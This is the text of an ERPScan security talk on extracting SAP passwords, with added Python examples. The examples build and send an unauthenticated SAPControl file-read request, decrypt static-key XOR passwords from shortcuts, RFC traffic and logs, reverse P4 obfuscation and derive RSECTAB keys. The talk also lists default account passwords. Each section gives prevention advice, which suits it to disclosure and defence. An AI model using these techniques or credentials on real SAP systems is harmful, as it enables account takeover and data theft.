Invest in security to secure investments
All your SAP Passwords belong to us.
Dmitry Chastuchin, Director, Security Consulting, ERPScan
About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SAP
• The most popular business application
• More than 250000 customers worldwide
• More than 83 % of Forbes 500 run SAP
SAP security
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data
Fraud
• False transactions
• Modification of master data
Sabotage
• Denial of service
• Modification of financial reports
• Access to the technology network (SCADA) through trust relations
Is it remotely exploitable?
5000+ non-web SAP services are exposed on the Internet worldwide, including Dispatcher, Message Server, SapHostControl, etc.
[Chart: number of exposed instances per service type - SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
SAP MMC – overview
• MMC is installed by default on port 5<ID>13
• Used for remote management of SAP servers
• Commands are executed via a SOAP interface
• By default, SSL is not implemented
• The administrative password is transmitted using basic auth (Base64)
• By sniffing this password, we can get full control over the server
SAP MMC – attacks
• Many attacks can be implemented without authentication
• Attacks can be executed by sending SOAP requests
• Mostly, it is information disclosure and denial of service
• Also, OS command execution
Advanced MMC attacks
ReadLogFile SOAP request used to read a file from the server (%COUNT% is a placeholder for the number of entries to return):
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
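The request above, built and checked programmatically. This is an added example written for this write-up, not ERPScan tooling or SAP code: the envelope and the 5<NN>13 port come from the slides, the 5<NN>14 TLS port and the SOAPAction header value are assumptions from SAPControl conventions, and the host name and instance number in the main block are made up.

```python
"""Build (and optionally send) a SAPControl ReadLogFile request.

Added example for this write-up, not ERPScan tooling.  The envelope mirrors
the request on the slide; host/instance values below are made up.
"""
import http.client
import xml.etree.ElementTree as ET
from typing import Dict, Tuple
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SAPCONTROL_NS = "urn:SAPControl"
SESSION_NS = "http://www.sap.com/webas/630/soap/features/session/"


def sapcontrol_port(instance_no: int, tls: bool = False) -> int:
    """Slides: the MMC/sapstartsrv SOAP interface listens on 5<NN>13.
    5<NN>14 for the TLS variant is an assumption (SAPControl convention)."""
    if not 0 <= instance_no <= 99:
        raise ValueError("instance number must be 00..99")
    return 50000 + instance_no * 100 + (14 if tls else 13)


def build_readlogfile_request(filename: str, maxentries: int = 100,
                              statecookie: str = "EOF") -> bytes:
    """Return the SOAP envelope from the slide with %COUNT% filled in."""
    if maxentries < 0:
        raise ValueError("maxentries must be non-negative")
    body = (
        '<?xml version="1.0"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}">'
        '<SOAP-ENV:Header>'
        f'<sapsess:Session xmlns:sapsess="{SESSION_NS}">'
        '<enableSession>true</enableSession>'
        '</sapsess:Session>'
        '</SOAP-ENV:Header>'
        '<SOAP-ENV:Body>'
        f'<ns1:ReadLogFile xmlns:ns1="{SAPCONTROL_NS}">'
        f'<filename>{escape(filename)}</filename>'
        '<filter/><language/>'
        f'<maxentries>{int(maxentries)}</maxentries>'
        f'<statecookie>{escape(statecookie)}</statecookie>'
        '</ns1:ReadLogFile>'
        '</SOAP-ENV:Body>'
        '</SOAP-ENV:Envelope>'
    )
    return body.encode("utf-8")


def parse_readlogfile_request(envelope: bytes) -> Dict[str, str]:
    """Pull the ReadLogFile parameters back out of an envelope, so what is
    about to be sent can be inspected (also used by the tests)."""
    root = ET.fromstring(envelope)
    node = root.find(f".//{{{SAPCONTROL_NS}}}ReadLogFile")
    if node is None:
        raise ValueError("no ReadLogFile element in envelope")
    return {child.tag: (child.text or "") for child in node}


def send_readlogfile(host: str, instance_no: int, filename: str,
                     maxentries: int = 100, timeout: float = 10.0) -> Tuple[int, bytes]:
    """POST the request over plain HTTP (slides: no SSL by default) and
    return (status, raw response body).  SOAPAction value is an assumption."""
    conn = http.client.HTTPConnection(host, sapcontrol_port(instance_no), timeout=timeout)
    try:
        conn.request("POST", "/",
                     body=build_readlogfile_request(filename, maxentries),
                     headers={"Content-Type": "text/xml; charset=utf-8",
                              "SOAPAction": '""'})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    # Only builds the request; to send it against a system you are authorised
    # to test, call send_readlogfile("sapj2ee.example.test", 0, path) instead.
    req = build_readlogfile_request(
        "j2ee/cluster/server0/log/system/userinterface.log", 50)
    print(req.decode("utf-8"))
    print(parse_readlogfile_request(req))
```

The builder escapes the file name so a path containing `&` or `<` still yields well-formed XML; the parser round-trips the envelope to confirm exactly which file and how many entries will be requested before anything is sent.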
PWN
If an attacker can read a file from the server OS, they can obtain clear-text passwords of SAP users and, as a result, compromise the SAP system.
Default passwords
User name    Password
SAP*         06071992, PASS
DDIC         19920706
TMSADM       PASSWORD, $1Pawd2&
EARLYWATCH   SUPPORT
SAPCPIC      ADMIN
Passwords on client side
• Attack via ActiveX - a lot of issues with RCE inside (1519966, 1327004, 1092631, …)
• Attack via client bugs - buffer overflow in saplogon.exe (1504547)
What after that?
SapLogon shortcuts!
Often, lazy users store the password for their SAP account in shortcuts.
This is what a typical shortcut looks like (file: <name>.sap):
[System]
Name=DM0
Description=Test Sap Server
Client=800
[User]
Name=SAP*
Language=EN
Password=PW_48B7231FD1FE390C
[Function]
Title=myShortcut
Command=se16
[Configuration]
WorkDir=C:\Documents and Settings\Administrator\My Documents\SAP\SAP GUI
[Options]
Reuse=1
…or like this (file: sapshortcut.ini):
[Label]
Key1=myShortcut
[Command]
Key1=-desc="Test Sap Server" -sid="DM0" -clt="800" -u="SAP*" -l="EN" -tit="myShortcut" -cmd="se16" -wd="C:\Documents and Settings\Administrator\My Documents\SAP\SAP GUI" -ok="/nse16" -pwenc="PW_48B7231FD1FE390C"
pwenc="PW_48B7231FD1FE390C"
→ PW_48B7231FD1FE390C
→ 48B7231FD1FE390C (16 hex digits, i.e. 8 bytes)
I used this password: 06071992 (8 characters). Looks like XOR encryption.
• After a few experiments, we found out:
  – Yes, this is XOR
  – Yes, the key is static for all SAPLogon installations
• The key is: 788113…dc49b0
• …and the Python code to decrypt it:
key = "788…"   # static SAPLogon XOR key (hex, truncated on the slide)

def sxor(s1, s2):
    """Byte-wise XOR of two byte strings; stops at the shorter one."""
    return bytes(a ^ b for a, b in zip(s1, s2))

enc_pass = "PW_48B7231FD1FE390C"   # Password= / -pwenc= value from the shortcut
# drop the "PW_" prefix, hex-decode ciphertext and key, XOR them
dec_pass = sxor(bytes.fromhex(enc_pass[3:]), bytes.fromhex(key))
print("Decoded password is: " + dec_pass.decode("latin-1"))
Prevention
• Don't use SAPGUI 6.4 (there are no patches for some vulns)
• Patch SAPGUI with the latest SP
• Don't store passwords in shortcuts (HKCU\Software\SAP\SAPShortcut\Security, EnablePassword=0)
• Make sure that you do not activate the storage of passwords in SAP shortcuts
• Authentication security for SAP shortcuts: http://help.sap.com/SAPHELP_NWPI71/helpdata/en/4d/dc9db9bc0e02cfe10000000a42189b/content.htm
Passwords from USR02, USH02, USRPWDHISTORY
USR02 password hash
• Well-known password area
• Hash algorithm (CODVN = code version):
  – CODVN A
  – CODVN B (MD5-based)
  – CODVN D (MD5-based)
  – CODVN E (MD5-based)
  – CODVN F (SHA1-based)
  – CODVN G (code versions B & F)
  – CODVN H (SHA-1-based)
  – CODVN I (code versions B, F & H)
• Just use John the Ripper
Prevention
• Use the latest algorithm
• SAP Note 2467: Password rules and preventing incorrect logons
• SAP Note 721119: Logon with (delivered) default user fails
• SAP Note 735356: Special character in passwords; reactivation not possible
• SAP Note 862989: New password rules as of SAP NetWeaver 2004s
• SAP Note 874738: New password hash calculation procedure (code version E)
• SAP Note 991968: Value list for login/password_hash_algorithm
• SAP Note 1023437: Downwardly incompatible passwords since NW2004s
• SAP Note 1237762: Protection against password hash attacks
• SAP Note 1300104: CUA – New password hash procedures - Background information
• SAP Note 1458262: Recommended settings for password hash algorithms
• SAP Note 1484692: Protect read access to password hash value tables
• SAP Note 1488159: SUIM – RSUSR003 – Incorrect results for CODVN = F
Passwords from RFC request
• If an attacker catches an RFC request with logon data, he will be:
  – Happy because he got the login and password
  – Upset because the password is encrypted
  – Happy because the encryption is just XOR (lol)
  – Happy because the key is static. Key: 313ec…a4021
  – Very happy because he got the clear text password
• …and the Python code to decrypt it:
key = "313e…"   # static RFC XOR key (hex, truncated on the slide)

def sxor(s1, s2):
    """Byte-wise XOR of two byte strings; stops at the shorter one."""
    return bytes(a ^ b for a, b in zip(s1, s2))

enc_pass = "0108F357D03F770D"   # encrypted password field from the captured RFC request
dec_pass = sxor(bytes.fromhex(enc_pass), bytes.fromhex(key))
print("Decoded password is: " + dec_pass.decode("latin-1"))
Prevention
• Secure RFC connections using SNC
• SAP Security Note 1724516
• RFC and SNC: http://help.sap.com/saphelp_nw70ehp2/helpdata/en/72/e52c4057cb185de10000000a1550b0/content.htm
SAP Visual Admin password
SAP VisualAdmin
• SAP Visual Admin – a remote tool for controlling the J2EE Engine
• Uses the P4 protocol – SAP's proprietary
• By default, all data is transmitted in cleartext
• P4 can be configured to use SSL to prevent MitM
• Passwords are transmitted with some sort of encryption
• In reality, it is a reversible transformation with hardcoded constants and no key at all (see the decompiled code below)
Insecure password encryption in P4
char mask = 43690;   // 0xAAAA
char check = 21845;  // 0x5555
char[] result = new char[data.length + 1];

for (int i = 0; i < data.length; ++i) {
    mask = (char)(mask ^ data[i]);   // running XOR of every char so far
    result[i] = mask;
}
result[data.length] = (char)(mask ^ check);   // trailing check value

return result;
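The routine above re-implemented in Python together with its inverse, to show that the "encryption" is a running XOR against the hardcoded 0xAAAA mask with a 0x5555 check value and can be undone by anyone on the wire without a key. This is an added example for this write-up, not SAP's or ERPScan's code; it works on the 16-bit Java char values exactly as the loop does (how those chars are serialised in the P4 stream is not shown on the slide and not handled here), and the sample password is made up.

```python
"""P4 password obfuscation from the decompiled Java above, and its inverse.

Added example, not SAP or ERPScan code.  Operates on 16-bit Java char values;
the on-the-wire serialisation of those chars is not covered by the slide.
"""
from typing import List

MASK = 0xAAAA    # 'mask'  = 43690 in the Java
CHECK = 0x5555   # 'check' = 21845 in the Java


def p4_obfuscate(password: str) -> List[int]:
    """Port of the Java loop: output char i is MASK XORed with every password
    char up to position i; a check char (last mask ^ CHECK) is appended."""
    mask = MASK
    out = []
    for ch in password:
        mask = (mask ^ ord(ch)) & 0xFFFF   # char arithmetic wraps at 16 bits
        out.append(mask)
    out.append((mask ^ CHECK) & 0xFFFF)
    return out


def p4_deobfuscate(chars: List[int]) -> str:
    """Invert the chain: password[i] = out[i] ^ out[i-1], with out[-1] = MASK.
    Rejects input whose trailing char is not last_mask ^ CHECK."""
    if not chars:
        raise ValueError("empty input")
    body, trailer = chars[:-1], chars[-1]
    prev = MASK
    recovered = []
    for c in body:
        recovered.append(chr((c ^ prev) & 0xFFFF))
        prev = c
    if (prev ^ CHECK) & 0xFFFF != trailer:
        raise ValueError("check value mismatch: not a P4-obfuscated password")
    return "".join(recovered)


if __name__ == "__main__":
    sample = "Adm1n!"   # made-up password
    blob = p4_obfuscate(sample)
    print([f"{c:04x}" for c in blob])
    print(p4_deobfuscate(blob))
```

Because each output char differs from the previous one only by the corresponding password char, the scheme leaks the password length directly and the whole password to anyone who captures the sequence; the trailing check value only detects transmission errors, it provides no secrecy.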
DEMO: SAP Visual Admin password sniffing
Prevention
• Secure P4 connections using SSL
• SAP Security Note 1724516
• Using the P4 protocol over a secure connection: http://help.sap.com/saphelp_nw73ehp1/helpdata/en/48/2d9ba88aef4bb9e10000000a42189b/content.htm
SAP JAVA Security Storage
SecStore
• The AS Java stores security-relevant information encrypted in a file in the file system, in particular:
  – Database user SAP<SID>DB and its password
  – Database connection information
  – Administrator user and its password
• The secure storage file is located at: \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
SecStore.properties:
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
• The AS Java uses the SAP Java Cryptography Toolkit to encrypt the information in the secure store with the TripleDES algorithm. The encryption is performed during the AS Java installation process.
• Let's look deeper
• The algorithm is TripleDES. We need a key for decryption.
• The main issue is that the key file is located in the same directory as the encrypted data: \usr\sap\<SID>\SYS\global\security\data\SecStore.key
• The key consists of two parts:
  – Version information
  – Encrypted key phrase
• Version information. It affects the TripleDES key:
  – If version >= 7.00.000, then the TripleDES key = key phrase + <SID>
• Encrypted key phrase:
  – By default, it is the initial password which the administrator sets during SAP system installation. Often, this phrase equals the DB password or an SAP administrator account password (SAP*, DDIC, J2EE_Admin, etc.)
  – The key phrase is "encrypted" with XOR and a static key: 43,-74…,-41,-67
• That's why, if an attacker only gets the SecStore.key file, they can also get access to SAP, because they now have the initial password
• OK. We have the encrypted password (SecStore.properties)
• We have the decryption key (SecStore.key)
• We can get all sensitive information from the Security Storage
• As I said, the data is encrypted with the TripleDES algorithm
• More precisely, the encryption uses TripleDES in CBC mode with a secret key which is derived from a password with the SHA hash algorithm:
  – The password is the key phrase from SecStore.key + <SID> (if version >= 7.00.000)
  – The salt is the value 0000000000000000
• We also wrote a tool which decrypts all the stuff from the SAP JAVA AS Security Storage (SecStore_Cr.jar)
• Also, the SAP Secure Store file can have another name (e.g. JUpgrade.properties) and store other interesting data, like:
  – Password for the SAP OS user (SIDADM)
  – DB password
  – DDIC password
  – etc…
Prevention
• Install SAP Note 1619539
• Restrict read access to the files SecStore.properties, JUpgrade.properties, and SecStore.key
• Managing secure storage in the file system: http://help.sap.com/saphelp_nw70ehp2/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
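A check for the "restrict read access" item above: it reports secure-store files that are readable or writable by anyone other than their owner, and flags the case the slides describe, where SecStore.key and SecStore.properties sit side by side and both are exposed. The file names (including the SLD ones, slddest.cfg and slddest.cfg.key, which appear later in the deck) come from the slides; the check itself is an added example for this write-up, not an SAP or ERPScan tool, and the demo runs on constructed files in a temporary directory rather than a real /usr/sap tree.

```python
"""Permission check for SAP secure-store files named on the slides.

Added example, not an SAP/ERPScan tool.  The demo uses constructed files in a
temporary directory; on a real system point check_secstore_dir() at
/usr/sap/<SID>/SYS/global/security/data (path layout is an assumption).
"""
import os
import stat
import tempfile
from typing import Dict, List

# File names from the slides (AS Java secure store and SLD supplier config)
SENSITIVE = ["SecStore.properties", "JUpgrade.properties", "SecStore.key",
             "slddest.cfg", "slddest.cfg.key"]


def check_file(path: str) -> List[str]:
    """Findings for one file; a missing file is simply not a finding."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path}: readable by group/others (mode {mode:04o})")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group/others (mode {mode:04o})")
    return findings


def _exposed(path: str) -> bool:
    """True if the file exists and grants any group/other permission."""
    return os.path.exists(path) and bool(stat.S_IMODE(os.stat(path).st_mode) & 0o077)


def check_secstore_dir(directory: str) -> List[str]:
    """Findings for every sensitive file in the directory, plus the
    co-location issue: key and data readable together by a non-owner."""
    findings = []
    for name in SENSITIVE:
        findings += check_file(os.path.join(directory, name))
    data = os.path.join(directory, "SecStore.properties")
    key = os.path.join(directory, "SecStore.key")
    if _exposed(data) and _exposed(key):
        findings.append("SecStore.key sits beside SecStore.properties and both are "
                        "exposed: anyone who can read both can decrypt the store")
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed demo: data + key files first world-readable (0644), then
    owner-only (0600).  Returns the findings for both states."""
    with tempfile.TemporaryDirectory() as d:
        names = ("SecStore.properties", "SecStore.key")
        for name in names:
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write("demo content, not a real store\n")
            os.chmod(p, 0o644)
        before = check_secstore_dir(d)
        for name in names:
            os.chmod(os.path.join(d, name), 0o600)
        after = check_secstore_dir(d)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for state, findings in demo().items():
        print(state, findings or "OK")
```

The co-location finding is deliberately tied to the permissions rather than to the mere presence of the key file, since the key always lives next to the data on a stock installation; what an operator can change is who may read the two files.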
Passwords from log files
Log files
• We know about many places where SAP writes logs
• The administrator can define the verbosity level
• An attacker can find many interesting things in log files: information about the system, information about the users, even session information
• A very interesting path with logs: /sapinst_instdir/
But what about passwords?
• Passwords in SAP log files look like this: [screenshot of dev_umconfigurator.trc]
• Sometimes, we can find a clear text password: [screenshot of sapinst_dev.<n>.log]
• Sometimes, we can find an encrypted password
• Guess what type of encryption is used? :)
• Right! XOR with a static hardcoded key: 31…65d
• As a result, we have a decryptor:
key = "31XXXXXXXXXXXX5d"   # static hardcoded XOR key (hex, masked on the slide)

def sxor(s1, s2):
    """Byte-wise XOR of two byte strings; stops at the shorter one."""
    return bytes(a ^ b for a, b in zip(s1, s2))

def prepare(val):
    """The trace stores the ciphertext as decimal byte values joined by '|';
    convert them straight to bytes (no hex round trip, which would drop the
    leading zero of values below 16)."""
    return bytes(int(a) for a in val.split("|"))

encr = prepare(input("Enter encrypted password: "))
dec_pass = sxor(encr, bytes.fromhex(key))
print("Decoded password is: " + dec_pass.decode("latin-1"))
• The same story with the config file usr\sap\<SID>\config\usagetypes.properties
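One decoder for the three static-key XOR formats covered on these slides (the SAPLogon shortcut "PW_<hex>" value, the RFC logon data as plain hex, and the sapinst trace form of '|'-separated decimal bytes), plus the known-plaintext step the research itself used: with a static key, one password you set yourself gives you the key bytes. This is an added example for this write-up, not ERPScan's scripts; the real keys are truncated on the slides, so DEMO_KEY is a made-up 16-byte key and every ciphertext below was constructed with it.

```python
"""Static-key XOR 'encryption' as used for SAPLogon shortcuts, RFC logon data
and sapinst traces (slides above), plus known-plaintext key recovery.

Added example, not ERPScan's code.  DEMO_KEY is made up (the real keys are
truncated on the slides); the sample ciphertexts were produced with it.
"""

DEMO_KEY = bytes.fromhex("5a3c9e1704b8d2f6a1c37e5b9d04f218")   # hypothetical key


def sxor(data: bytes, key: bytes) -> bytes:
    """XOR data with key byte by byte (the truncating zip() of the slides,
    but refusing silently short keys)."""
    if len(key) < len(data):
        raise ValueError("key shorter than data")
    return bytes(a ^ b for a, b in zip(data, key))


def parse_encrypted(token: str) -> bytes:
    """Normalise the three encodings seen on the slides to raw ciphertext."""
    t = token.strip()
    if t.upper().startswith("PW_"):          # SAPLogon shortcut: Password=PW_<hex>
        return bytes.fromhex(t[3:])
    if "|" in t:                             # sapinst trace: decimal bytes joined by '|'
        return bytes(int(x) for x in t.split("|"))
    return bytes.fromhex(t)                  # RFC logon data: plain hex


def decrypt(token: str, key: bytes = DEMO_KEY) -> str:
    """Ciphertext token in any of the three formats -> password."""
    return sxor(parse_encrypted(token), key).decode("latin-1")


def encrypt(password: str, key: bytes = DEMO_KEY) -> bytes:
    """XOR is its own inverse; used here to build test vectors."""
    return sxor(password.encode("latin-1"), key)


def to_trace_format(ct: bytes) -> str:
    """Render ciphertext the way the trace on the slide does: '48|183|...'."""
    return "|".join(str(b) for b in ct)


def recover_key_prefix(token: str, known_password: str) -> bytes:
    """Known-plaintext attack on a static XOR key: key = ct ^ pt.
    A password of your own choosing yields len(password) key bytes; a longer
    chosen password (or several) yields the whole key."""
    ct = parse_encrypted(token)
    pt = known_password.encode("latin-1")
    if len(pt) > len(ct):
        raise ValueError("password longer than ciphertext")
    return sxor(ct[:len(pt)], pt)


if __name__ == "__main__":
    # Constructed vectors: the slide's password "06071992" under DEMO_KEY
    print(decrypt("PW_6A0AAE203581EBC4"))              # shortcut form
    print(decrypt("6A0AAE203581EBC4"))                 # RFC form
    print(decrypt("106|10|174|32|53|129|235|196"))    # trace form
    print(recover_key_prefix("PW_6A0AAE203581EBC4", "06071992").hex())
```

The trace vector contains the byte value 10 on purpose: a decoder that converts each decimal to hex with `hex()` and concatenates would turn it into a single digit and shift every following byte, which is why the decoder above goes straight from decimals to bytes.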
Prevention
• Don't use TRACE_LEVEL = 3
• Delete traces when work is finished
• Mask security-sensitive data in the HTTP access log
• Incrementing/decrementing the trace level: https://help.sap.com/saphelp_nwpi71/helpdata/en/46/962416a5a613e8e10000000a155369/content.htm
Passwords from SLD config file
SLD
• SLD is the central information repository for your system landscape
• It contains information about:
  – technical systems
  – landscapes
  – business systems
  – products
  – software components in your system landscape
SLD password files
• Configuration file: usr\sap\<sid>\DVEBMGS<nn>\exe\slddest.cfg, containing:
  – User name with the DataSupplierLD role
  – User password (wooot!)
  – Host name
  – Port
• Encrypted with the DES algorithm in early versions of SLD. The static default key is: 0A…71F
• But if the user specifies a key, then the key file is stored next to the encrypted data file, in slddest.cfg.key
• In the latest versions of SLD, another algorithm is used: TripleDES with a hardcoded key
Prevention
• Restrict read access to the files slddest.cfg and slddest.cfg.key
• Configuring sldreg and transferring data to SLD: http://help.sap.com/saphelp_nw70/helpdata/en/42/ea5ff4b5d61bd9e10000000a11466f/content.htm
Passwords from ABAP SecStore
Password from RSECTAB
• The secure storage is a component of the SAP Web Application Server ABAP
• It allows the encrypted storage of sensitive data that SAP applications require when logging into other systems
• These SAP applications use the storage to store passwords:
  – RFC destinations
  – Exchange Infrastructure (XI)
  – LDAP system users
  – SAPphone
  – SAPconnect
  – CCMS (Generic Request and Message Generator)
• Table RSECTAB; the encrypted records can be dumped directly from the database:
select rawtohex(DATA) from SAPSR3.RSECTAB
• TripleDES, 3DES mode: DES-EDE3
• The triple DES algorithm uses the DES-EDE3 method where a 24-byte key is supplied. This means there are three DES operations in the sequence encrypt-decrypt-encrypt with three different keys. The first key is bytes 1 to 8, the second key bytes 9 to 16 and the third key bytes 17 to 24
• Two rounds
• First round
• Encrypt:
  – char randomPrefix[2];
  – char payload[109];
  – char payloadLength;
  – char magicLocal[4];
  – char magicGlobalSalted[4];
  – char recordIdentifierA7Hash[16];
• Key for the first round of encryption, derived from the default key:
Key'def[1]  = Keydef[1]  ^ (Hsup[0] & 0xF0)
Key'def[6]  = Keydef[6]  ^ (Hsup[0] & 0x0F)
Key'def[7]  = Keydef[7]  ^ (Hsup[3] & 0xF0)
Key'def[10] = Keydef[10] ^ (Hsup[1] & 0xF0)
Key'def[13] = Keydef[13] ^ (Hsup[1] & 0x0F)
Key'def[16] = Keydef[16] ^ (Hsup[4] & 0x0F)
Key'def[19] = Keydef[19] ^ (Hsup[2] & 0xF0)
Key'def[20] = Keydef[20] ^ (Hsup[2] & 0x0F)
• Where Hsup is md5(sidA7[3] + insnoA7[10])
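The round-1 key derivation above written out as code. This is an added example for this write-up, not SAP's or ERPScan's implementation. It takes the slide's index table verbatim as 0-based offsets into the 24-byte DES-EDE3 key and reads sidA7[3] / insnoA7[10] as the 3-character SID followed by a 10-character installation number; both readings are assumptions. The default key is not on the slides, so DEMO_DEFAULT_KEY is a made-up 24-byte value. What the code makes visible: the per-system tweak changes at most eight nibbles, all derived from an MD5 of values that are not secret, so the default key alone is enough to reconstruct the round-1 key of any system.

```python
"""RSECTAB first-round key tweak from the slide, as code.

Added example, not SAP or ERPScan code.  Assumptions: the slide's indices are
0-based byte offsets into the 24-byte EDE3 key; Hsup = MD5(SID || installation
number) over the ASCII strings; DEMO_DEFAULT_KEY and the SID/installation
number in the main block are made up.
"""
import hashlib
from typing import List, Tuple

# (key byte index, Hsup byte index, nibble mask), copied from the slide
TWEAKS: List[Tuple[int, int, int]] = [
    (1, 0, 0xF0), (6, 0, 0x0F), (7, 3, 0xF0), (10, 1, 0xF0),
    (13, 1, 0x0F), (16, 4, 0x0F), (19, 2, 0xF0), (20, 2, 0x0F),
]

# Hypothetical 24-byte default key (the real one is not on the slides)
DEMO_DEFAULT_KEY = bytes.fromhex("00112233445566778899aabbccddeeff0011223344556677")


def hsup(sid: str, insno: str) -> bytes:
    """Hsup = md5(sidA7[3] + insnoA7[10]): 3-char SID, 10-char installation number."""
    if len(sid) != 3 or len(insno) != 10:
        raise ValueError("SID must be 3 chars, installation number 10 chars")
    return hashlib.md5((sid + insno).encode("ascii")).digest()


def round1_key(default_key: bytes, sid: str, insno: str) -> bytes:
    """Apply the eight nibble XORs from the slide to the default key."""
    if len(default_key) != 24:
        raise ValueError("DES-EDE3 key must be 24 bytes")
    h = hsup(sid, insno)
    k = bytearray(default_key)
    for key_idx, h_idx, mask in TWEAKS:
        k[key_idx] ^= h[h_idx] & mask
    return bytes(k)


def split_ede3(key: bytes) -> Tuple[bytes, bytes, bytes]:
    """Bytes 1-8, 9-16, 17-24 of the key are K1, K2, K3 (slide)."""
    return key[0:8], key[8:16], key[16:24]


def tweaked_bits(default_key: bytes, derived: bytes) -> int:
    """How many key bits the per-system tweak actually changed."""
    return sum(bin(a ^ b).count("1") for a, b in zip(default_key, derived))


def max_tweak_bits() -> int:
    """Upper bound on system-specific bits added by the tweak (8 nibbles)."""
    return sum(bin(mask).count("1") for _, _, mask in TWEAKS)


if __name__ == "__main__":
    k = round1_key(DEMO_DEFAULT_KEY, "DM0", "0020123456")   # made-up SID / installation no.
    print(k.hex())
    print([part.hex() for part in split_ede3(k)])
    print(tweaked_bits(DEMO_DEFAULT_KEY, k), "of at most", max_tweak_bits(), "key bits changed")
```

Even if the index convention on the slide were 1-based rather than 0-based, the conclusion is unchanged: eight nibbles of a 192-bit key are varied per system, and the variation is a public function of SID and installation number.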
• Second round
• Encrypt all data with the default key
• What about the default key?
• It is encrypted via 3DES-EDE2, too
• But the key for this encryption is hardcoded
Prevention
• Change the default key
• SAP Security Note 1902611
• Choosing your own key: http://help.sap.com/saphelp_nw70ehp2/helpdata/en/e0/f73d41945bdb2be10000000a1550b0/content.htm
Passwords from DBCON table
DBCON table
• SAP has connections to different DBs
• The administrator can manage these connections via transaction DBCO
• All DB connection information is stored encrypted in the table DBCON (Description of Database Connections)
• Encrypted data looks like: V01/0030ZctvSB67Wv1OuVLazse4ORik
  – BASE64 + DES
  – hardcoded key: 59A…70E
  – decrypted data includes a static salt: BE HAPPY
Prevention
• Restrict access to the table DBCON
• Restrict access to the transaction DBCO
• SAP Security Notes 1638280 and 1823566
Passwords from HANA
SAP HANA
• User details (including passwords) are stored in hdbuserstore
• Located in the /usr/sap/hdbclient directory
• About hdbuserstore:
  – SSFS_HDB.DAT
  – with user data
  – with keys
• SSFS_HDB.DAT
• Signature: RSecSSFsData
• Algorithm: 3DES
• The default key is the same as in the ABAP Security Storage
• SAP HANA – in-memory database
• But it drops some data to the file system:
  – Backup
  – Savepoint
"The SAP HANA database holds the bulk of its data in memory for maximum performance, but it still uses persistent disk storage to provide a fallback in case of failure. Data is automatically saved from memory to disk at regular savepoints. The data belonging to a savepoint represents a consistent state of the data on disk and remains so until the next savepoint operation has completed. After a power failure, the database can be restarted like any disk-based database and returns to its last consistent state."
– SAP HANA Security Guide
• "Data volume encryption ensures that anyone who can access the data volumes on disk using operating system commands cannot see the actual data. If data volumes are encrypted, all pages that reside in the data area on disk are encrypted using the AES-256-CBC algorithm."
• "After data volume encryption has been enabled, an initial page key is automatically generated. Page keys are never readable in plain text, but are encrypted themselves using a dedicated persistence encryption root key."
"SAP HANA uses SAP NetWeaver SSFS to protect the root encryption keys that are used to protect all encryption keys used in the SAP HANA system from unauthorized access."
• SSFS_HDB.DAT
  – HDB_SERVER/PERSISTENCE/ROOTKEY
  – HDB_SERVER/DPAPI
• The persistence encryption feature does not encrypt the following data:
  – Database redo log files
  – Database backups
  – Database traces
Prevention
• Change the encryption key after installation
• Restrict access to the key file
• Restrict access to the DAT file
• Security guide for HANA (p. 71): http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf
• Secure storage in the file system: http://help.sap.com/saphelp_nw70ehp2/helpdata/en/a0/82dd0abbde4696b98a8be133b27f3b/content.htm
Etc..
• ICF Password Repository – ICFSECPASSWD
• FI module passwords – FIEB_PASSWORD
• Oracle Fail Safe – stores passwords inside the ENVIRONMENT variable (Note 1764043 p. 4)
• SAP BusinessObjects LCMuser – hardcoded SVN user – \SAP BusinessObjects Enterprise XI.0\LCM_repository\svn_repository\conf
• SAP BusinessObjects axis2 login:password – axis2.xml
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
SAP guides
It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of duties
Conclusion
